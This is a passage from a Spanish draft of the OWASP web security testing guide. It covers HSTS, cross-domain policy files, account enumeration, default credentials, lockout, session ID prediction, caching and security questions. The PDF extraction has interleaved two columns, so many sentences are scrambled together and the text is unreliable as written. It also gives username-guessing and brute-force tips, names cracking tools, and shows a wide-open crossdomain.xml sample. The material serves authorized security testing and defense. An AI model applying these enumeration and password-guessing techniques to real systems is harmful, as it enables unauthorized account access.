Set-Cookie: adminOnlyCookie1=...; expires=Tue, 18-Aug-2009
22:44:31 GMT; domain=www.example.com Libros Blancos
Set-Cookie: adminOnlyCookie2=...; expires=Mon, 18-Aug-2008 • RFC 2616: “Hypertext Transfer Protocol -- HTTP/1.1”
22:54:31 GMT; domain=www.example.com
• RFC 2109 and RFC 2965: HTTP State Management Mechanism”
Set-Cookie: adminOnlyCookie3=...; expires=Sun, 19-Aug-2007
22:44:30 GMT; domain=www.example.com
Connection: close • Amit Klein: “XS(T) attack variants which can, in some cases, eliminate the
need for TRACE” - securityfocus.com
Si el evaluador obtiene un "405 Method not allowed " o "501 Method • Arshan Dabirsiaghi: “Bypassing VBAAC with HTTP Verb Tampering” -
Unimplemented", el objetivo static.swpag.info
aplicación/framework/lenguaje/sistema/firewall) está funcionando
correctamente. Si regresa un código de respuesta "200", y la respuesta no
contiene ningúna información, es probable que la aplicación ha procesado
la solicitud sin autenticación o autorización y se deben realizar pruebas
para certificarlas.
Pruebe el HTTP Strict Transport Security
(OTG-CONFIG-007)
Resumen
Considerando la importancia de esta medida de seguridad, es importante $ curl -s -D- https://domain.com/ | grep Strict
verificar que el sitio web utilice este encabezado HTTP, para garantizar
que todos los datos viajan encriptados desde el navegador al servidor.
Resultado esperado:
La función HTTP Strict Transport Security (HSTS) permite a una Strict-Transport-Security: max-age=...
aplicación web informar al navegador, mediante el uso de un encabezado
de respuesta especial, que nunca debe establecer una conexión con los
servidores de dominio especificados mediante HTTP. En su lugar debe
Referencias
establecer automáticamente todas las solicitudes de conexión para
acceder al sitio a través de HTTPS.
• OWASP HTTP Strict Transport Security - owasp.org
Resumen
Este es un ejemplo de la aplicación de la Rúbrica HSTS:
Aplicaciones Enriquecidas de Internet (RIA) han adoptado los archivos de
Strict-Transport-Security: max-age=60000; includeSubDomains
políticas de Adobe crossdomain.xml para permitir el acceso controlado de
dominio cruzado para consumo de datos y servicios, utilizando
tecnologías como Oracle Java, Silverlight y Adobe Flash. Por lo tanto, un
dominio puede conceder acceso remoto a sus servicios desde un dominio
El uso del encabezado por parte de las aplicaciones web debe revisarse
diferente. Sin embargo, a menudo los archivos de políticas que describen
para encontrar si podrían producirse los siguientes problemas de
las restricciones de acceso se configuran pobremente. Una configuración
seguridad:
pobre de los archivos de directivas permite ataques de Cross-site Request
Forgery (Falsificación de peticiones de sitios cruzados) y puede permitir
a terceros acceder a los datos sensibles para el usuario.
• Los atacantes olfateando el tráfico de red y accediendo a la información
transferida a través de un canal sin codificar.
• Los atacantes explotando un ataque de intermediario (man in the middle) ¿Cuáles son los archivos de directivas entre dominios?
debido al problema de aceptar certificados que no son de
Un archivo de políticas de dominios cruzados especifica los permisos que
confianza. un cliente web como Java, Adobe Flash, Adobe Reader, etc. utilizan para
acceder a datos entre dominios diferentes. Para Silverlight, Microsoft
• Los usuarios que entraron por error una dirección en el navegador, poniendo adoptó un subconjunto del crossdomain.xml de Adobe y, además, creó su
HTTP en lugar de HTTPS, o usuarios que hagan clic en un vínculo en una propio archivo de directivas entre dominios: clientaccesspolicy.xml.
aplicación web que indicó por error el protocolo HTTP.
<?xml version=”1.0”?>
Cada vez que un cliente web detecta que un recurso tiene que ser
<!DOCTYPE cross-domain-policy SYSTEM
solicitado a otro dominio, primero buscará un archivo de políticas en el
dominio de destino para determinar si puede realizar peticiones de
“http://www.adobe.com/xml/dtds/cross-domain-policy.dtd”>
dominio cruzado, incluyendo encabezados, y si se permiten los enlaces
basados en tomas de conexión (socket-based connections) .
<cross-domain-policy>
<site-control permitted-cross-domain-policies=”all”/>
Los archivos maestros de políticas se encuentran en la raíz del dominio. <allow-access-from domain=”*” secure=”false”/>
Un cliente puede recibir instrucciones para cargar un archivo de políticas
diferentes, pero siempre comprobará el archivo maestro de política <allow-http-request-headers-from domain=”*” headers=”*”
primero, para asegurarse de que el archivo maestro de políticas permite secure=”false”/>
el archivo de políticas solicitado.
</cross-domain-policy>
La mayoría de las aplicaciones RIA soportan crossdomain.xml. Sin ¿Cómo pueden los archivos de políticas de dominios cruzados ser
embargo, en el caso de Silverlight, solo le está permitido funcionar si forzados?
crossdomain.xml especifica que el acceso se permite desde cualquier
dominio. Para un control más detallado con Silverlight, debe usarse • Políticas de dominios cruzados excesivamente permisivas.
clientaccesspolicy.xml.
• Que generan respuestas del servidor que pueden ser tratadas como
archivos de políticas de dominios cruzados.
Los archivos de políticas conceden varios tipos de permisos: • Que usan la funcionalidad de carga de archivos para subirlos y tratarlos
como archivos de políticas de dominios cruzados.
• Permisos de encabezados • Leer datos restringidos o que estaban protegidos por políticas de origen
cruzado.
• Permisos de acceso HTTP/HTTPS
http://www.owasp.org/crossdomain.xml and
http://www.owasp.org/clientaccesspolicy.xml.
Ejemplo:
Pruebe las Definiciones de Roles (OTG-
<cross-domain-policy>
IDENT-001)
<allow-access-from domain=”*” />
Resumen
</cross-domain-policy>
Es común en las empresas modernas definir funciones de sistema para la
gestión de usuarios y autorización de recursos del sistema. En la mayoría
de las implementaciones de sistema, se espera que existan al menos dos
Resultado esperado: funciones: los administradores y usuarios regulares. El primero
representa un papel que permite el acceso a la funcionalidad privilegiada
e información sensible; el segundo que representa un papel que permite
el acceso a información y funcionalidad del negocio regular. Los roles
• una lista de archivos de políticas encontrados. bien desarrollados deben estar alineados con los procesos de negocio que
están soportados por la aplicación.
• Una configuración débil en las políticas.
• Adobe: “Cross-domain policy file usage recommendations for Flash Player” Pruebe los objetivos
- adobe.com
• Ingeniería de roles
Cómo probar • Crear mapas de los roles del negocio a los roles del sistema
Con o sin ayuda de los desarrolladores del sistema o administradores, • Separación de funciones
desarrolle un rol versus la matriz de permisos. La matriz debe enumerar
todos los roles que pueden ser provisionados y explorar los permisos que
pueden aplicarse a los objetos, así como las restricciones. Si una matriz es
proporcionada con la aplicación, esta debe ser validada por el evaluador;
Pruebe el Proceso de Registro del Usuario
si no existe, el evaluador debe generar y determinar si la matriz satisface
las políticas de acceso deseado por la aplicación. (OTG-IDENT-002)
Resumen
Ejemplo Algunos sitios web ofrecen un proceso de registro del usuario, que
automatiza (o semi-automatiza) la creación del acceso al sistema para los
Un ejemplo real de definiciones de roles se puede encontrar en la usuarios. Los requisitos de identidad para el acceso varían desde
documentación de funciones de WordPress [1]. WordPress tiene seis identificación positiva a ninguna en absoluto, dependiendo de los
roles por defecto desde Super Administrador hasta Suscriptor. requisitos de seguridad del sistema. Muchas aplicaciones públicas
automatizan totalmente el registro y el proceso de provisionamiento
porque el tamaño de la base de usuarios hace que sea imposible
manejarla manualmente. Sin embargo, muchas aplicaciones corporativas
provisionan usuarios manualmente, por lo que este tipo de prueba puede
no ser aplicable.
Objetivos de la prueba
Referencias
[1] ¿Cualquier persona puede registrarse para acceder?
[1] Role Engineering for Enterprise Security Management, E Coyne & J
Davis, 2007
[2] ¿Son validados por un ser humano antes de crear los registros, o se
conceden automáticamente si se cumplen los criterios?
[2] Role engineering and RBAC standards
Un proxy HTTP puede ser una herramienta útil para probar este control.
Referencias
[2] ¿Puede el intercambio de información durante el registro ser Diseño de registro de usuarios
manipulado?
Remediación
Ejemplo
Implemente una identificación y verificación de requisitos que
En el siguiente ejemplo de WordPress, el único requisito de identificación corresponden a los requisitos de seguridad de la información que las
es una dirección de correo electrónico accesible a la persona registrada. credenciales protegen.
Objetivos de la Prueba
En cambio, en el ejemplo de Google a continuación, la identificación de Verifique qué cuentas pueden aprovisionar otras cuentas y de qué tipo.
requisitos incluye nombre, fecha de nacimiento, país, número de teléfono
móvil, dirección de correo electrónico y respuesta CAPTCHA. Mientras
que sólo dos de estos pueden verificarse (dirección email y número de
móvil), los requisitos de identificación son más estrictos que en Cómo probar
WordPress.
Herramientas
• ¿Puede un administrador o usuario eliminar su cuenta? Aunque el enfoque más exhaustivo y exacto para completar esta prueba
es llevarla a cabo manualmente, las herramientas de proxy HTTP tambien
pueden ser útiles.
• ¿Cómo son gestionados los archivos o recursos propiedad del usuario eliminado?
¿Se eliminan? ¿Se transfiere el acceso?
El evaluador debe interactuar con el mecanismo de autenticación de la El navegador debe mostrar un mensaje similar al siguiente:
aplicación para entender si, enviando peticiones en particular, se logra
que la aplicación responda de diferentes maneras. Este problema existe
porque la información de aplicación web o servidor web es diferente
cuando el usuario proporciona un nombre de usuario válido que cuando
usa uno no válido.
Cómo probar
Resultado esperado:
http://www.foo.com/err.jsp?User=gooduser&Error=2
Generalmente, la aplicación debe responder con el mismo mensaje de
error y la longitud a las distintas solicitudes incorrectas. Si las respuestas
no son iguales, el evaluador debe investigar y averiguar la clave que crea Como se ve arriba, cuando un evaluador proporciona un ID de usuario y
una diferencia entre las dos respuestas. Por ejemplo: una contraseña a la aplicación web, ven un mensaje que indica que se ha
producido un error en la URL. En el primer caso han proporcionado un ID
de usuario equivocado y una contraseña equivocada. En el segundo, un ID
de usuario correcto y una contraseña equivocada, así que pueden
• Solicitud del cliente: usuario válido/ contraseña inválida--> identificar un ID de usuario válido.
• Solicitud del cliente: : usuario inválido/ contraseña inválida --> -Sondeo de una URI
Respuesta del servidor: 'Usuario no reconocido' A veces un servidor web responde diferente si recibe una solicitud de un
directorio existente o no. Por ejemplo, en algunos portales, cada usuario
está asociado con un directorio. Si los evaluadores intentan acceder a un
directorio existente, ellos podrían recibir un error de servidor web.
Las respuestas anteriores permiten al evaluador entender con la primera
solicitud que tienen un nombre de usuario válido para interactuar con la Un error muy común que se recibe desde el servidor web es:
aplicación, solicitando un conjunto de posibles usuarios y observar la
respuesta.
recibir "200 ok" con una imagen; en este caso, podemos suponer que
cuando recibimos la imagen específica el usuario no existe. Esta lógica
En el primer caso el usuario existe, pero el evaluador no puede ver la puede aplicarse a otra respuesta del servidor web; el truco es un buen
página análisis de los mensajes del servidor web y de la aplicación web.
CN000101
-Análisis de los títulos de la Página Web
….
Los evaluadores pueden recibir información útil del título de la página
web, donde pueden obtener un código de error específico o mensajes que A veces los usuarios son creados con un alias REALM y luego números
revelan si los problemas son del usuario o contraseña. secuenciales:
Por ejemplo, si un usuario no puede autenticarse en una aplicación y R2001 – user 001 for REALM2
recibe una página web cuyo título es similar a:
Por ejemplo, un mensaje similar al siguiente: • ID de usuarios asociados con nombres reales, por ejemplo, si Freddie
Mercury tiene un ID de usuario de "fmercury", entonces usted podría
Usuario Inválido: e-mail address is not valid or the specified user was not found.
adivinar que Roger Taylor tiene el ID de usuario "rtaylor".
Usuario válido: Your password has been successfully sent to the email address you
registered with.
Una vez más, podemos intuir un nombre de usuario de la información
recibida de una consulta LDAP o de la recopilación de información de
Google, por ejemplo, de un dominio específico. Google puede ayudar a
encontrar los usuarios de un dominio a través de consultas específicas o a
través de secuencias de comandos de carcaza (shell scripts) simples o
- Mensaje de Error 404 amigable
herramientas.
Cuando solicitamos a un usuario dentro del directorio que no existe, no
siempre recibimos un código de error 404. Por el contrario, podemos
Atención: mediante la enumeración de cuentas de usuario, se arriesga a Asegúrese de que la aplicación devuelve mensajes de error genéricos,
bloquear las cuentas después de un número predefinido de intentos consistentes en respuesta a nombres de cuenta válidos, contraseñas u
fallidos (basado en las políticas de la aplicación). También, a veces, su otras credenciales de usuario, ingresados durante el proceso de registro.
dirección IP puede ser prohibida por reglas dinámicas en la aplicación
firewall o sistema de prevención de intrusión.
Asegúrese que las cuentas de pruebas del sistema y cuentas por defecto
se eliminen antes de lanzar el sistema a producción (o exponiéndola a
Pruebas de Caja Gris una red no confiable).
Objetivos de la Prueba
Herramientas
Determine si una estructura de nombres de cuenta constante hace que la
• WebScarab: OWASP_WebScarab_Project aplicación sea vulnerable a la enumeración de la cuenta. Determine si los
mensajes de error de la aplicación permiten la enumeración de la cuenta.
• CURL: curl.haxx.se
• PERL: perl.org
Cómo probar
• Sun Java Access & Identity Manager users enumeration tool:
• Determine la estructura de nombres de cuentas.
aboutsecurity.net
• Evalúe la respuesta de la aplicación a nombres de cuentas válidos y no
válidos.
Remediación
Remediación
En seguridad informática, la autenticación es el proceso de intentar Para complicar más las cosas, existe la posibilidad de que el sitio tenga la
verificar la identidad digital del remitente de una comunicación. Un página de inicio accesible a través de HTTP (haciéndonos creer que la
ejemplo común de este proceso es el proceso de registro. Probar el transmisión es insegura), pero en realidad envía datos a través de HTTPS.
esquema de autenticación significa comprender cómo funciona el proceso Esta prueba se hace para asegurarse que un atacante no pueda recuperar
de autenticación y usar esa información para eludir el mecanismo de información sensible simplemente husmeando en la red con una
autenticación. herramienta de olfateo ( sniffer).
Para una discusión más detallada sobre las pruebas de seguridad de los
canales TLS/SSL, consulte el capítulo Probando SSL/TLS débiles. Aquí, el
evaluador simplemente tratará de entender si los datos que los usuarios
colocan en los formularios web para iniciar una sesión en un sitio web se
transmiten utilizando protocolos seguros que los protege de un atacante.
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.14) User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.14)
Gecko/20080404 Gecko/20080404
Content-length: 64
Ahora, imagine una página web accesible a través de HTTP y que sólo los
datos enviados desde el formulario de autenticación se transmiten a través
Ejemplo 2: Envío de datos con el método POST a través de HTTPS de HTTPS. Esta situación ocurre, por ejemplo, cuando estamos en un portal
de una gran empresa que ofrece diferente información y servicios que están
Supongamos que nuestra aplicación web utiliza el protocolo HTTPS para disponibles públicamente, sin identificación; pero el sitio también tiene una
cifrar los datos que estamos enviando (o por lo menos para la transmisión sección privada, accesible desde la página de inicio cuando los usuarios
de datos confidenciales, como credenciales). En este caso, cuando se inicia la inician una sesión; por lo que, al intentar iniciar la sesión, el encabezado de
aplicación web, el encabezado de la solicitud POST sería similar al siguiente: la solicitud se verá como el siguiente ejemplo:
Content-length: 45
User=test&Pass=test&portal=ExamplePortal
Referencias
Libros Blancos
• SSL is not about encryption Pruebas de las credenciales por defecto de aplicaciones comunes
• Personal técnico sin experiencia que no es consciente de la importancia de Muchas aplicaciones tienen mensajes de error detallados que informan a
cambiar las contraseñas por defecto en componentes de la infraestructura los usuarios sobre la validez de nombres de usuario introducidos. Esta
instalada o dejar la contraseña por defecto para "facilidad de información será útil cuando se busquen cuentas de usuario por defecto
mantenimiento". o predecibles. Dicha funcionalidad puede encontrarse, por ejemplo, en las
páginas de registro, restablecimiento de contraseña, contraseña olvidada
• Programadores que dejan puertas traseras para tener fácil acceso y probar y de inscripción. Una vez que ha encontrado un nombre de usuario por
su aplicación y después olvidan eliminarlas. defecto, también podría empezar a adivinar contraseñas para esta cuenta.
• Los usuarios administradores de una aplicación se nombran a menudo con el Los siguientes pasos pueden aplicarse para probar estos tipos de
nombre de la aplicación u organización. Esto significa que si está probando credenciales predeterminadas:
una aplicación denominada "Oscuridad", intente usar oscuridad/oscuridad o
cualquier otra combinación similar como el nombre de usuario y contraseña. •
Cuando se realiza una prueba para un cliente, inténtelo usando los nombres de
contactos que reciban como nombres de usuario con contraseñas comunes. • Mirar en la página de registro de usuarios puede ayudar a determinar el
Las direcciones de correo electrónico de clientes revelan el acuerdo de formato esperado y la longitud mínima o máxima de nombres y contraseñas
nombres para cuentas del usuario: si el empleado John Doe tiene la dirección de la aplicación. Si no existe una página de registro de usuarios, determine si
de correo electrónico jdoe@example.com, puede tratar de encontrar los la organización utiliza un acuerdo de nomenclatura estándar para los nombres
nombres de los administradores de sistemas en las redes sociales y adivinar su de usuario como su dirección de correo electrónico o el nombre antes de la
nombre de usuario mediante la aplicación de la misma convención a su "@" en el correo electrónico.
nombre.
• Trate de extrapolar, a partir de la aplicación, cómo se generan los nombres
de usuario. Por ejemplo, ¿un usuario puede escoger su propio nombre de
usuario o el sistema genera un nombre de cuenta para el usuario basado en
• Trate de usar todos los nombres de usuario anteriores con contraseñas en alguna información personal o usando una secuencia predecible? Si la
blanco. aplicación genera los nombres de cuenta en una secuencia predecible, como
user7811, trate de disolver recursivamente todas las cuentas posibles. Si puede
• Revise la fuente de la página y JavaScript, ya sea a través de un proxy o identificar una respuesta diferente de la aplicación cuando se utiliza un
mediante la visualización de la fuente. Busque cualquier referencia a los nombre de usuario válido y una contraseña incorrecta, entonces puede intentar
usuarios y contraseñas en la fuente. Por ejemplo “If username=’admin’ then un ataque forzoso con el nombre de usuario válido (o rápidamente probar
starturl=/admin.asp else /index.asp”. (para un registro exitoso versus un cualquiera de las contraseñas comunes identificadas antes en la sección de
registro fallido).También, si usted tiene una cuenta válida, entonces registre y referencia).
revise cada solicitud y respuesta para un registro válido versus un registro no
válido, como parámetros adicionales ocultos, peticiones GET interesantes
(login = yes), etc.
• Trate de determinar si la contraseña generada por el sistema es predecible.
Para ello, cree rápidamente muchas cuentas nuevas, una tras otra, para que
pueda comparar y determinar si las contraseñas son predecibles. Si son
Documento Pre-release cortesía de Fernando Vela para drangonjar.org
104
Guia de pruebas 4.0 "Borrador"
• Virus.org: virus.org
Prueba de Caja Gris
Herramientas
• Información o datos confidenciales: Las secciones privadas de una
• Burp Intruder: portswigger.net aplicación web podrían revelar documentos confidenciales, datos de
perfil de los usuarios, información financiera, datos bancarios, relaciones
• THC Hydra: thc.org de los usuarios, etc..
• Brutus: hoobie.net
• Nikto 2: cirt.net • Los paneles de administración: Estas secciones son utilizadas por los
webmasters para gestionar (modificar, borrar, añadir) el contenido de
aplicaciones web, gestión de creación de usuarios, asignar diferentes [6] Inicie la sesión con la contraseña correcta. La aplicación devuelve "su
privilegios a los usuarios, etc. cuenta está bloqueada.", confirmando así que la cuenta se bloquea
después de cinco intentos de autenticación incorrecta.
[7] Intente entrar con la contraseña correcta cinco minutos más tarde. La
• Oportunidades para nuevos ataques: Las secciones de una aplicación aplicación devuelve "su cuenta está bloqueada.", lo que demuestra que el
web autenticadas pueden contener vulnerabilidades que no están mecanismo de bloqueo no se desbloquea automáticamente después de
cinco minutos.
[8] Intente entrar con la contraseña correcta diez minutos más tarde. La
presentes en la sección pública de la aplicación web y pueden contener aplicación devuelve "su cuenta está bloqueada.", lo que demuestra que el
funcionalidades avanzadas que no están disponibles para los usuarios mecanismo de bloqueo no se desbloquea automáticamente después de
públicos. diez minutos.
• Evaluar la resistencia del mecanismo de liberación para abrir sin Un CAPTCHA puede dificultar los ataques de fuerza bruta, pero puede
autorización la cuenta. venir con su propio conjunto de debilidades (ver Probando el CAPTCHA)
y no debe reemplazar a un mecanismo de bloqueo.
Cómo probar
Para evaluar la resistencia del mecanismo de liberación para desbloquear
Por lo general, para probar la fuerza de los mecanismos de bloqueo, se la cuenta, inicie el mecanismo de desbloqueo y busque las debilidades.
necesitará acceso a una cuenta a la que usted esté dispuesto o pueda
darse el lujo de bloquear. Si tiene solo una cuenta con la que puede iniciar
una sesión en la aplicación web, realice esta prueba al final del plan de
pruebas para evitar que usted no pueda continuar su prueba debido a una Los mecanismos tipicos de desbloqueo pueden involucrar preguntas
cuenta bloqueada. secretas o un link de desbloqueo por correo electrónico.El enlace de
desbloqueo deberá ser un enlace único de un solo uso, para evitar que un
atacante adivine o reproduzca el enlace y realice ataques forzosos en
lotes. Las preguntas y respuestas secretas deben ser fuertes (ver
Para evaluar la capacidad del mecanismo de bloqueo de cuentas para Probando pregunta/respuesta de seguridad débil).
mitigar el forzado o adivinanza de contraseñas, intente realizar un
registro inválido mediante el uso de la contraseña incorrecta varias veces,
antes de utilizar la contraseña correcta para verificar que la cuenta fue
bloqueada. El siguiente es un ejemplo de la prueba:
Referencias
Vea el articulo de OWASP Sobre Ataques Forzosos. Los problemas relacionados con el esquema de autenticación pueden
encontrarse en diferentes etapas del ciclo de vida de desarrollo de
software (SDLC), como las fases de diseño, desarrollo e implementación:
Remediación
Aplique mecanismos de desbloqueo de cuentas dependiendo del nivel de • En los errores de la fase de diseño, se puede incluir una definición
riesgo. En orden de menor a mayor seguridad: equivocada de las secciones de la aplicación a proteger, la opción de no
aplicar protocolos de encriptación fuertes para asegurar la transmisión
de las credenciales y muchos más.
[2] Desbloqueo con autoservicio (desbloqueo que envía un correo electrónico a la • En la fase de implementación de la aplicación, puede haber problemas
dirección de correo electrónico registrada). durante la instalación de la aplicación (actividades de instalación y
configuración) debido a la falta de habilidades técnicas requeridas o por
[3] Desbloqueo manual por un administrador. falta de una buena documentación.
• Modificación de parámetros
HTTP/1.1 200 OK
Solicitud de página directa
Date: Sat, 11 Nov 2006 10:22:44 GMT
Si una aplicación web implementa el control de acceso sólo en el registro
en la página, el esquema de autenticación se podría eludir. Por ejemplo, si
Server: Apache
un usuario solicita directamente una página diferente a través de la
navegación forzada, esa página puede no comprobar las credenciales del Connection: close
usuario antes de conceder el acceso. Intente acceder directamente a una
página protegida a través de la barra de direcciones en su navegador para Content-Type: text/html; charset=iso-8859-1
utilizar este método de prueba.
<HTML><HEAD>
</HEAD><BODY>
</BODY></HTML>
Modificación de parámetros
Predicción de sesión ID
podría ser capaz de encontrar un Identificador de Sesión válida y obtener Inyección de SQL (Formulario de Autenticación HTML)
acceso no autorizado a la aplicación, haciéndose pasar por un usuario
previamente autenticado. Una inyección de SQL es una técnica de ataque ampliamente conocida.
Esta sección no describirá esta técnica en detalle ya que hay varias
secciones en esta guía que explican técnicas de inyección más allá del
alcance de esta sección.
En la siguiente figura, los valores dentro de las cookies aumentan
linealmente, por lo que podría ser fácil para un atacante adivinar un
Identificador de Sesión válida.
1. if ( isset($HTTP_COOKIE_VARS[$cookiename . ‘_sid’]) ||
7. $sessionmethod = SESSION_METHOD_COOKIE; Además, algunos sitios web ofrecen funcionalidades personalizadas de "
Recuérdame" para permitir que los usuarios mantengan su sesión en un
8. } sistema de cliente específico.
9.
Referencias
• Mark Roxberry: “PHPBB 2.0.13 vulnerability” • Busque las contraseñas que se almacenan en una cookie. Examine las
cookies almacenadas por la aplicación. Compruebe que las credenciales no se
• David Endler: “Session ID Brute Force Exploitation and Prediction” - almacenan en texto claro, sino con funciones hash.
http://www.cgisecurity.com/lib/SessionIDs.pdf
• Examinar el mecanismo de hashing: si se trata de un algoritmo común, bien comparten la misma debilidad de presentar información sensible previamente
conocido, compruebe su fuerza; en las funciones hash de creación propia ; mostrada.
intente varios nombres de usuario para comprobar si la función de hash es
fácilmente predecible.
• Compruebe que las credenciales sean enviadas solamente durante la fase el La primera y más simple prueba consiste en introducir información sensible
registro y no con cada solicitud a la aplicación. en la aplicación y cerrar la sesión. Entonces el evaluador hace clic en el botón
"Atrás" del navegador para comprobar si accede o muestra información
• Considere otros campos sensibles (por ejemplo, una respuesta a una sensible ingresada anteriormente sin ser autenticado.
pregunta secreta que debe ingresarse en una cuenta de recuperación de
contraseña o formulario de desbloqueo).
Resumen
En esta fase el evaluador comprueba que la aplicación indique correctamente El botón "Atrás" puede detenerse para que no muestre datos sensibles. Esto
al navegador que no recuerde datos sensibles. puede hacerse mediante:
Los navegadores pueden almacenar información con fines de almacenamiento • Ajustando el Control de Caché: a "must-revalidate"
en caché e historia. El almacenamiento en caché se utiliza para mejorar el
rendimiento; así la información que apareció previamente no necesita
descargarse otra vez. Se utilizan mecanismos de historia para conveniencia del
usuario, por lo que él puede ver exactamente lo que vio en el momento de Cache de navegador
obtener el recurso.
Aquí los evaluadores comprueban que la aplicación no tiene fugas de
datos sensibles hacia la caché del navegador. Para ello, pueden utilizar un
proxy (como WebScarab) y buscar a través de las respuestas del servidor
Si se muestra información sensible al usuario (como su dirección, datos de que pertenecen al tiempo de la sesión, verificando que para cada página
tarjeta de crédito, número de seguro social o usuario), esta información podría que contenga información confidencial, el servidor instruyó al navegador
ser almacenada con fines de almacenamiento en caché o de historia y, por lo para que no almacene los datos en caché. Una directiva de este tipo puede
tanto, ser recuperables examinando la caché del navegador o pulsando el emitirse en los encabezados de respuesta HTTP:
botón "Atrás" del navegador.
• Cache-Control: no-cache, no-store
• Expires: 0
Cómo probar
• Pragma: no-cache
Historia del navegador
Estas directivas son generalmente robustas, aunque indicadores Prueba de Caja Gris
adicionales pueden ser necesarios para el encabezado Cache-Control para
prevenir de una mejor manera los archivos vinculados persistentemente La metodología para la prueba es equivalente al caso de la Caja Negra, ya
en el sistema de archivos. Estos incluyen: que en ambos escenarios los evaluadores tienen acceso completo a las
cabeceras de respuesta del servidor y el código HTML. Sin embargo, con
• Cache-Control: must-revalidate, pre-check=0, post-check=0, max-age=0, s- pruebas de Caja Gris, el evaluador puede tener acceso a las credenciales
maxage=0 de la cuenta que les permitirá probar páginas sensibles que son
accesibles sólo a usuarios autenticados.
HTTP/1.1:
Herramientas
Cache-Control: no-cache
• OWASP Zed Attack Proxy
Pragma: no-cache
Referencias
Expires: <past date or illegal value (e.g., 0)>
Libros Blancos
Objetivos de la prueba
[1] Mozilla Firefox:
Determine la resistencia de la aplicación contra ataques de fuerza bruta o
• Unix/Linux: ~/.mozilla/firefox/<profile-id>/Cache/ adivinanza de contraseña usando diccionarios de contraseñas disponibles
mediante la evaluación de los requerimientos de longitud, complejidad,
• Windows: C:\Documents and Settings\<user_name>\Local reutilización y caducidad de las contraseñas.
Settings\Application Data\Mozilla\Firefox\Profiles\<profile-id>\Cache
caracteres como letras minúsculas y mayúsculas, dígitos y símbolos Típicamente se generan con la creación de la cuenta y requieren que el
especiales? usuario seleccione algunas de las preguntas previamente generadas y
provea una respuesta adecuada. Puede permitir al usuario generar sus
[2] ¿Con qué frecuencia puede un usuario cambiar su contraseña? ¿Qué tan propios pares de preguntas y respuestas. Ambos métodos son propensos
rápido puede un usuario cambiar su contraseña después de un cambio a inseguridades. Idealmente, las preguntas de seguridad deben generar
anterior? Los usuarios pueden eludir requisitos de historial de contraseña respuestas que sólo son conocidas por el usuario y no pueden ser
cambiando su contraseña cinco veces seguidas para que después del último predichas o descubiertas por nadie más. Esto es más difícil de lo que
cambio de contraseña recuperen su contraseña inicial otra vez. suena.
[6] ¿Se impide al usuario que utilice su nombre de usuario u otra información
Preguntas previamente generadas:
de la cuenta (como el primer o último nombre) en la contraseña?
La mayoría de preguntas previamente generadas son de naturaleza
bastante simple y pueden llevar a respuestas inseguras. Por ejemplo:
Referencias
• Las respuestas pueden ser conocidas por los familiares o amigos cercanos
del usuario, por ejemplo, "¿Cuál es el apellido de soltera de su madre?",
• Brute Force Attacks: owasp.org
"¿Cuál es su fecha de nacimiento?"
• Password length & complexity: owasp.org
• Las respuestas pueden ser fácilmente predecibles, e.g. "¿Cuál es su color
favorito?", "¿Cuál es su equipo favorito de béisbol?"
• Las respuestas pueden ser atacadas con fuerza bruta, por ejemplo, "¿Cuál es
Remediación
el nombre de su profesora favorita de secundaria?" - La respuesta está
probablemente en alguna lista fácilmente descargable de nombres populares y,
Para mitigar el riesgo de contraseñas fácilmente adivinables facilitando el
por lo tanto, un ataque de fuerza bruta simple puede secuenciarse en un script.
acceso no autorizado, hay dos soluciones: introducir controles de
autenticación adicionales (es decir, autenticación de dos factores) o introducir
• Las respuestas pueden ser públicamente visibles, por ejemplo, ¿cuál es su
una política de contraseñas fuertes. El más simple y más barato de estos es la
película favorita?"- la respuesta puede encontrarse fácilmente en la página de
introducción de una política de contraseña fuerte que asegura la longitud, la
perfil de redes sociales del usuario.
complejidad, la reutilización y la caducidad de la contraseña.
Trate de obtener una lista de preguntas de seguridad mediante la • Una respuesta objetiva como la "primera escuela" u otros hechos que pueden
creación de una nueva cuenta o siguiendo el proceso de “I don’t consultarse.
remember my password” (no recuerdo mi contraseña). Trate de generar
tantas preguntas como sea posible para obtener una buena idea del tipo • Algunas posibles respuestas, tales como "qué modelo fue su primer
de preguntas de seguridad que se hacen. Si alguna de las preguntas de automóvil". Estas preguntas dan al atacante una lista corta de posibles
seguridad cae en las categorías descritas anteriormente, son vulnerables respuestas y, basado en estadísticas, el atacante podría calificar las respuestas
a ser atacadas (adivinadas,ataque de fuerza bruta, disponible en las redes de más a menos probables.
sociales, etc.).
https://www.schneier.com/essays/archives/2005/02/the_curse_of_the_sec.htm
l
El siguiente paso es evaluar la solidez de las preguntas de seguridad. ¿Las
respuestas se obtendrían por una simple búsqueda en Google o con
ataque de ingeniería social? Como evaluador de penetración, este es un
Pruebas para determinar un cambio débil de contraseña o funciones de
tutorial paso a paso de cómo explotar un esquema de preguntas de
restablecimiento (OTG-AUTHN-009)
seguridad:
Resumen
El cambio de contraseña y la función de restablecimiento de una Por otro lado, si se utilizan preguntas secretas, el siguiente paso es
aplicación es un autoservicio de cambio de contraseña o un mecanismo evaluar su solidez. Esta prueba específica se discute en el párrafo de
de restablecimiento para los usuarios. Este mecanismo de autoservicio Probando la Seguridad Débil de Pregunta/Respuesta de esta guía.
permite a los usuarios cambiar o restablecer rápidamente la contraseña
sin que un administrador intervenga. Cuando se cambian las contraseñas
se cambian típicamente dentro de la aplicación. Cuando las contraseñas
se restablecen son presentadas dentro de la aplicación o por correo • ¿Cómo se comunican las contraseñas restablecidas al usuario?
electrónico al usuario. Esto puede indicar que las contraseñas se
almacenan en texto plano o formato desencriptable.
[2] Determine la resistencia de la función de restablecimiento de Un escenario menos inseguro es si la herramienta de restablecimiento de
contraseñas contra el que puedan eludir o adivinar. contraseña obliga al usuario a cambiar inmediatamente su contraseña.
Aunque no tan sigilosamente como el primer caso, permite al atacante
obtener acceso y bloquer al usuario real.
Cómo probar
Tanto para el cambio de contraseña como para restablecer la contraseña, La mejor seguridad se logra si el restablecimiento de contraseña se
es importante verificar: realiza a través de un correo electrónico a la dirección del usuario
inicialmente registrado o a alguna dirección de correo electrónico; Esto
fuerza al atacante no sólo a adivinar a qué correo fue enviado el
restablecimiento de contraseña de la cuenta (a menos que la aplicación
[1] Si los usuarios, que no son administradores, pueden cambiar o restablecer muestre esta información), sino también a comprometer la cuenta de
contraseñas para cuentas que no sean la propia. correo electrónico, con el fin de obtener la contraseña temporal o el
vínculo para restablecer la contraseña.
[2] Si los usuarios pueden manipular o subvertir el cambio de contraseña o
restablecer el proceso para cambiar o restablecer la contraseña de otro usuario
o administrador.
